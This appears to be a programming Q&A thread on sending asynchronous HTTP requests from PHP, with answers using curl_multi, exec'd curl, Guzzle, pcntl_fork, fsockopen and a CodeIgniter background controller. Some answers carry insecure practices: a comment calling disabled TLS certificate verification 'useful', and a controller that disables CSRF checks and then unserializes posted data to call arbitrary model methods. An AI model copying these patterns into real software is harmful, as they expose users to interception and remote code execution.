$cmi = curl_multi_init();
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($cmi, $curl);
$running = null;
do {
curl_multi_exec($cmi, $running);
usleep(100000); // 0.1 second; sleep() only accepts whole seconds
if(!$waitResult)
break;
} while ($running > 0);
curl_multi_remove_handle($cmi, $curl);
if($waitResult){
$curlInfos = curl_getinfo($curl);
if((int) $curlInfos['http_code'] == 200){
curl_multi_close($cmi);
return curl_multi_getcontent($curl);
}
}
curl_multi_close($cmi);
}
If you are using a Linux environment, you can use PHP's exec function to invoke the command-line curl. Here is sample code that makes an asynchronous HTTP POST.
function _async_http_post($url, $json_string) {
$run = "curl -X POST -H 'Content-Type: application/json'";
// escapeshellarg() keeps quotes in the payload or URL from breaking out of the command
$run.= " -d " . escapeshellarg($json_string) . " " . escapeshellarg($url);
$run.= " > /dev/null 2>&1 &";
exec($run, $output, $exit);
return $exit == 0;
}
This code does not need any extra PHP libraries, and it can complete the HTTP POST in less than 10 milliseconds.
Interesting problem. I'm guessing you just want to trigger some process or action on the other server, but don't care what the results are and want your script to continue. There is probably something in cURL that can make this happen, but you may want to consider using exec() to run another script on the server that does the call if cURL can't do it. (Typically people want the results of the script call so I'm not sure if PHP has the ability to just trigger the process.) With exec() you could run a wget or even another PHP script that makes the request with file_get_contents().
Nobody seems to mention Guzzle, which is a PHP HTTP client that makes it easy to send HTTP requests. It can work with or without Curl. It can send both synchronous and asynchronous requests.
use GuzzleHttp\Exception\RequestException;
use Psr\Http\Message\ResponseInterface;
$client = new GuzzleHttp\Client();
$promise = $client->requestAsync('GET', 'http://httpbin.org/get');
$promise->then(
function (ResponseInterface $res) {
echo $res->getStatusCode() . "\n";
},
function (RequestException $e) {
echo $e->getMessage() . "\n";
echo $e->getRequest()->getMethod();
}
);
You'd be better off using message queues instead of the suggested methods.
I'm sure this is a better solution, although it requires a little more work than just sending a request.
Let me show you my way :)
It needs Node.js installed on the server
(my server sends 1000 HTTPS GET requests in only 2 seconds)
url.php :
<?php
$urls = array_fill(0, 100, 'http://google.com/blank.html');
function execinbackground($cmd) {
if (substr(php_uname(), 0, 7) == "Windows"){
pclose(popen("start /B ". $cmd, "r"));
}
else {
exec($cmd . " > /dev/null &");
}
}
file_put_contents("urls.txt", implode("\n", $urls));
execinbackground("nodejs urlscript.js urls.txt");
// { do your work while get requests being executed.. }
?>
urlscript.js :
var https = require('https');
var url = require('url');
var http = require('http');
var fs = require('fs');
var dosya = process.argv[2];
var logdosya = 'log.txt';
var count=0;
http.globalAgent.maxSockets = 300;
https.globalAgent.maxSockets = 300;
setTimeout(timeout,100000); // maximum execution time (in ms)
function trim(string) {
return string.replace(/^\s*|\s*$/g, '')
}
fs.readFile(process.argv[2], 'utf8', function (err, data) {
if (err) {
throw err;
}
parcala(data);
});
function parcala(data) {
var data = data.split("\n");
count=''+data.length+'-'+data[1];
data.forEach(function (d) {
req(trim(d));
});
/*
fs.unlink(dosya, function d() {
console.log('<%s> file deleted', dosya);
});
*/
}
function req(link) {
var linkinfo = url.parse(link);
if (linkinfo.protocol == 'https:') {
var options = {
host: linkinfo.host,
port: 443,
path: linkinfo.path,
method: 'GET'
};
https.get(options, function(res) {res.on('data', function(d) {});}).on('error', function(e) {console.error(e);});
} else {
var options = {
host: linkinfo.host,
port: 80,
path: linkinfo.path,
method: 'GET'
};
http.get(options, function(res) {res.on('data', function(d) {});}).on('error', function(e) {console.error(e);});
}
}
process.on('exit', onExit);
function onExit() {
log();
}
function timeout()
{
console.log("i am too far gone");process.exit();
}
function log()
{
var fd = fs.openSync(logdosya, 'a+');
fs.writeSync(fd, dosya + '-'+count+'\n');
fs.closeSync(fd);
}
For me, the question of asynchronous GET requests came up because I needed to make hundreds of requests and process the result of every one. Each request takes a significant number of milliseconds, which adds up to minutes(!) of total execution time with simple file_get_contents.
In this case, w_haigh's comment on the php.net page for this function was very helpful: http://php.net/manual/en/function.curl-multi-init.php
So, here is my upgraded and cleaned-up version for making lots of requests simultaneously.
For my case it's equivalent to the "asynchronous" way. Maybe it helps someone!
// Build the multi-curl handle, adding both $ch
$mh = curl_multi_init();
// Build the individual requests, but do not execute them
$chs = [];
$chs['ID0001'] = curl_init('http://webservice.example.com/?method=say&word=Hello');
$chs['ID0002'] = curl_init('http://webservice.example.com/?method=say&word=World');
// $chs[] = ...
foreach ($chs as $ch) {
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true, // Return requested content as string
CURLOPT_HEADER => false, // Don't save returned headers to result
CURLOPT_CONNECTTIMEOUT => 10, // Max seconds wait for connect
CURLOPT_TIMEOUT => 20, // Max seconds on all of request
CURLOPT_USERAGENT => 'Robot YetAnotherRobo 1.0',
]);
// Well, with a little more of code you can use POST queries too
// Also, useful options above can be CURLOPT_SSL_VERIFYHOST => 0
// and CURLOPT_SSL_VERIFYPEER => false ...
// Add every $ch to the multi-curl handle
curl_multi_add_handle($mh, $ch);
}
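// Execute all of the queries simultaneously, and continue when ALL OF THEM are complete
$running = null;
do {
$status = curl_multi_exec($mh, $running);
if ($running) {
curl_multi_select($mh); // block until there is activity instead of busy-looping
}
} while ($running && $status === CURLM_OK);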
// Close the handles
foreach ($chs as $ch) {
curl_multi_remove_handle($mh, $ch);
}
curl_multi_close($mh);
// All of our requests are done, we can now access the results
// The ids let us match each response to the request
// that produced it
$responses = [];
foreach ($chs as $id => $ch) {
$responses[$id] = curl_multi_getcontent($ch);
curl_close($ch);
}
unset($chs); // Finita, no more need any curls :-)
print_r($responses); // output results
It's easy to rewrite this to handle POST or other types of HTTP(S) requests, or any combination of them, and to add cookie support, redirects, HTTP auth, etc.
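As a rough sketch of the POST variant mentioned above: the helper names make_post_handle and fetch_all are made up for illustration, and the URL in the usage comment is just the placeholder from the answer. It only uses standard cURL options (CURLOPT_POST, CURLOPT_POSTFIELDS, CURLOPT_FOLLOWLOCATION) and assumes the cURL extension is enabled.

```php
<?php
// Hypothetical helper: build (but do not execute) one POST request handle.
function make_post_handle(string $url, array $fields)
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,                      // return the body as a string
        CURLOPT_POST           => true,                      // send a POST request
        CURLOPT_POSTFIELDS     => http_build_query($fields), // urlencoded form body
        CURLOPT_FOLLOWLOCATION => true,                      // follow redirects
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 20,
    ]);
    return $ch;
}

// Hypothetical helper: run all handles in parallel, return bodies keyed by id.
function fetch_all(array $chs): array
{
    $mh = curl_multi_init();
    foreach ($chs as $ch) {
        curl_multi_add_handle($mh, $ch);
    }
    $running = 0;
    do {
        $status = curl_multi_exec($mh, $running);
        if ($running > 0) {
            curl_multi_select($mh, 1.0); // wait for activity instead of spinning
        }
    } while ($running > 0 && $status === CURLM_OK);

    $responses = [];
    foreach ($chs as $id => $ch) {
        $responses[$id] = curl_multi_getcontent($ch);
        curl_multi_remove_handle($mh, $ch);
        curl_close($ch);
    }
    curl_multi_close($mh);
    return $responses;
}

// Usage (not executed here, since it needs a reachable server):
// $responses = fetch_all([
//     'ID0003' => make_post_handle('http://webservice.example.com/', ['method' => 'say', 'word' => 'Hi']),
// ]);
```

GET and POST handles can be mixed freely in the array passed to fetch_all, since each handle carries its own options.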
Try:
//Your Code here
$pid = pcntl_fork();
if ($pid == -1) {
die('could not fork');
}
else if ($pid)
{
echo("Bye");
}
else
{
//Do Post Processing
}
This will NOT work as an apache module, you need to be using CGI.
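To run several modules in parallel this way, the parent can fork one child per job and then wait for all of them. The following is only a sketch under assumptions: the job names and the closures are placeholders (in practice each child might include one module file), and it needs the pcntl extension on the command line.

```php
<?php
// Hypothetical job list; each closure stands in for one module.
$jobs = [
    'j1' => function () { usleep(200000); return 0; },
    'j2' => function () { usleep(100000); return 0; },
];

$children = []; // pid => job name
foreach ($jobs as $name => $job) {
    $pid = pcntl_fork();
    if ($pid === -1) {
        fwrite(STDERR, "could not fork\n");
        exit(1);
    }
    if ($pid === 0) {
        // Child process: run one job, then exit with its status code.
        exit($job());
    }
    $children[$pid] = $name; // parent: remember which child runs which job
}

// Parent: wait until every child has finished and collect the exit codes.
$exitCodes = [];
while ($children) {
    $pid = pcntl_wait($status);
    if ($pid <= 0) {
        break; // no children left, or an error occurred
    }
    if (isset($children[$pid])) {
        $exitCodes[$children[$pid]] = pcntl_wexitstatus($status);
        unset($children[$pid]);
    }
}
ksort($exitCodes);
print_r($exitCodes);
```

Only the exit code comes back to the parent here. To return richer data, each child would have to write to a file, a pipe or the database.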
I found this interesting link on asynchronous processing (GET requests): askapache
Furthermore, you could do asynchronous processing by using a message queue such as beanstalkd.
Here's an adaptation of the accepted answer for performing a simple GET request.
One thing to note: if the server does any URL rewriting, this will not work. You'll need to use a more full-featured HTTP client.
/**
* Performs an async get request (doesn't wait for response)
* Note: One limitation of this approach is it will not work if server does any URL rewriting
*/
function async_get($url)
{
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
if (!$fp) return false; // connection failed, nothing to send
$out = "GET ".(isset($parts['path'])?$parts['path']:'/')." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
}
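Note that the function above puts only $parts['path'] into the request line, so any query string in the URL is dropped. A minimal sketch of building the request text so that the query string is kept and an empty path falls back to / could look like this (build_get_request is a made-up name, not part of the answer):

```php
<?php
// Hypothetical helper: build the raw GET request text for a URL.
function build_get_request(string $url): string
{
    $parts  = parse_url($url);
    // Request target: path (default "/") plus the query string, if any.
    $target = isset($parts['path']) ? $parts['path'] : '/';
    if (isset($parts['query'])) {
        $target .= '?' . $parts['query'];
    }
    return "GET " . $target . " HTTP/1.1\r\n"
         . "Host: " . $parts['host'] . "\r\n"
         . "Connection: Close\r\n\r\n";
}

echo build_get_request('http://www.example.com/test.php?someprm=xyz');
```

The returned string can be passed to fwrite() in place of $out.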
Just a few corrections to the scripts posted above. The following works for me:
function curl_request_async($url, $params, $type='GET')
{
$post_params = array();
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
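$parts=parse_url($url);
$is_https = isset($parts['scheme']) && $parts['scheme'] == 'https';
// fsockopen needs the ssl:// transport prefix for HTTPS; port 443 alone would send plaintext
$fp = fsockopen(($is_https ? 'ssl://' : '').$parts['host'],
$is_https ? 443 : 80,
$errno, $errstr, 30);
if (!$fp) return false; // connection failed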
$out = "$type ".$parts['path'] . (isset($parts['query']) ? '?'.$parts['query'] : '') ." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
// Data goes in the request body for a POST request
if ('POST' == $type && isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
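The manual encoding loop at the top of that function can also be written with PHP's built-in http_build_query. This is just a sketch: encode_params is a hypothetical name, and arrays are flattened with commas to mirror what the function above does.

```php
<?php
// Hypothetical helper: encode parameters as an urlencoded form body.
function encode_params(array $params): string
{
    $flat = [];
    foreach ($params as $key => $val) {
        // Join array values with commas, as the loop above does.
        $flat[$key] = is_array($val) ? implode(',', $val) : $val;
    }
    return http_build_query($flat);
}

echo encode_params(['ids' => [1, 2], 'q' => 'hello world']), "\n";
// prints: ids=1%2C2&q=hello+world
```

One difference from the manual loop: http_build_query also URL-encodes the keys, not only the values.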
Based on this thread I made this for my CodeIgniter project. It works just fine. You can have any function processed in the background.
A controller that accepts the async calls.
class Daemon extends CI_Controller
{
// Remember to disable CI's csrf-checks for this controller
function index( )
{
ignore_user_abort( 1 );
try
{
if ( strcmp( $_SERVER['REMOTE_ADDR'], $_SERVER['SERVER_ADDR'] ) != 0 && !in_array( $_SERVER['REMOTE_ADDR'], $this->config->item( 'proxy_ips' ) ) )
{
log_message( "error", "Daemon called from untrusted IP-address: " . $_SERVER['REMOTE_ADDR'] );
show_404( '/daemon' );
return;
}
$this->load->library( 'encrypt' );
$params = unserialize( urldecode( $this->encrypt->decode( $_POST['data'] ) ) );
unset( $_POST );
$model = array_shift( $params );
$method = array_shift( $params );
$this->load->model( $model );
if ( call_user_func_array( array( $this->$model, $method ), $params ) === FALSE )
{
log_message( "error", "Daemon could not call: " . $model . "::" . $method . "()" );
}
}
catch(Exception $e)
{
log_message( "error", "Daemon has error: " . $e->getMessage( ) . $e->getFile( ) . $e->getLine( ) );
}
}
}
And a library that does the async calls
class Daemon
{
public function execute_background( /* model, method, params */ )
{
$ci = &get_instance( );
// The callback URL (it's ourselves)
$parts = parse_url( $ci->config->item( 'base_url' ) . "/daemon" );
if ( strcmp( $parts['scheme'], 'https' ) == 0 )
{
$port = 443;
$host = "ssl://" . $parts['host'];
}
else
{
$port = 80;
$host = $parts['host'];
}
if ( ( $fp = fsockopen( $host, isset( $parts['port'] ) ? $parts['port'] : $port, $errno, $errstr, 30 ) ) === FALSE )
{
throw new Exception( "Internal server error: background process could not be started" );
}
$ci->load->library( 'encrypt' );
$post_string = "data=" . urlencode( $ci->encrypt->encode( serialize( func_get_args( ) ) ) );
$out = "POST " . $parts['path'] . " HTTP/1.1\r\n";
$out .= "Host: " . $parts['host'] . "\r\n"; // not $host: it may carry the ssl:// prefix
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= "Content-Length: " . strlen( $post_string ) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= $post_string;
fwrite( $fp, $out );
fclose( $fp );
}
}
This method can be called to process any model::method() in the 'background'. It uses variable arguments.
$this->load->library('daemon');
$this->daemon->execute_background( 'model', 'method', $arg1, $arg2, ... );
Suggestion: build a FRAMESET HTML page that contains, let's say, 9 frames. Each frame will GET a different "instance" of your myapp.php page. There will be 9 different threads running on the web server, in parallel.
For PHP 5.5+, mpyw/co is the ultimate solution. It works much like tj/co in JavaScript.
Example
Assume that you want to download the avatars of several specified GitHub users. The following steps are required for each user:
Get the content of http://github.com/mpyw (GET HTML)
Find <img class="avatar" src="..."> and request it (GET IMAGE)
Legend for the diagrams:
---: Waiting for my own response
...: Waiting for other responses in parallel flows
Many well-known curl_multi-based scripts already give us the following flow.
        /-----------GET HTML\  /--GET IMAGE.........\
       /                     \/                      \
[Start]  GET HTML..............----------------GET IMAGE  [Finish]
       \                     /\                      /
        \-----GET HTML....../  \-----GET IMAGE....../
However, this is not efficient enough. Wouldn't you like to eliminate the needless waiting time?
        /-----------GET HTML--GET IMAGE\
       /                                \
[Start]  GET HTML----------------GET IMAGE  [Finish]
       \                                /
        \-----GET HTML-----GET IMAGE.../
Yes, it's very easy with mpyw/co. For more details, visit the repository page.
Here is my own PHP function for sending a POST request to a specific URL of any page.
Sample usage of my function:
<?php
parse_str("email=myemail#ehehehahaha.com&subject=this is just a test", $fields);
echo HTTP_Post("http://example.com/mail.php", $fields);
exit;
?>
<?php
/*********HTTP POST using FSOCKOPEN **************/
// by ArbZ
function HTTP_Post($URL, $data, $referrer="") {
// parsing the given URL
$URL_Info=parse_url($URL);
// Building referrer
if($referrer=="" && isset($_SERVER["SCRIPT_URI"])) // if not given use this script as referrer
$referrer=$_SERVER["SCRIPT_URI"];
// making string from $data
$values=array();
foreach($data as $key=>$value)
$values[]="$key=".urlencode($value);
$data_string=implode("&",$values);
// Find out which port is needed - if not given use standard (=80)
if(!isset($URL_Info["port"]))
$URL_Info["port"]=80;
// building POST-request: HTTP headers (each line must end with \r\n)
$request ="POST ".$URL_Info["path"]." HTTP/1.1\r\n";
$request.="Host: ".$URL_Info["host"]."\r\n";
$request.="Referer: $referrer\r\n";
$request.="Content-type: application/x-www-form-urlencoded\r\n";
$request.="Content-length: ".strlen($data_string)."\r\n";
$request.="Connection: close\r\n";
$request.="\r\n";
$request.=$data_string;
$fp = fsockopen($URL_Info["host"],$URL_Info["port"]);
if(!$fp) return false; // connection failed
fputs($fp, $request);
$result="";
while(!feof($fp)) {
$result .= fgets($fp, 128);
}
fclose($fp);
// Return the second "&"-separated piece of the raw response (empty string if absent)
$result = explode("&",$result);
return isset($result[1]) ? $result[1] : "";
}
// Helper: extract the text between the first matching pair of tags
function getTextBetweenTags($string, $tagname) {
$pattern = "/<$tagname ?.*>(.*)<\/$tagname>/";
preg_match($pattern, $string, $matches);
return isset($matches[1]) ? $matches[1] : "";
}
?>
Try this code....
$chu = curl_init();
curl_setopt($chu, CURLOPT_URL, 'http://www.myapp.com/test.php?someprm=xyz');
curl_setopt($chu, CURLOPT_FRESH_CONNECT, true);
curl_setopt($chu, CURLOPT_TIMEOUT, 1);
curl_exec($chu);
curl_close($chu);
Please don't forget to enable the cURL PHP extension.
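This works fine for me; sadly, you cannot retrieve the response to your request:
<?php
header("Location: http://mahwebsite.net/myapp.php?var=dsafs");
?>
It works very fast, no need for raw TCP sockets :) Note that this only redirects the visitor's browser to that URL; the server itself does not send a request.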
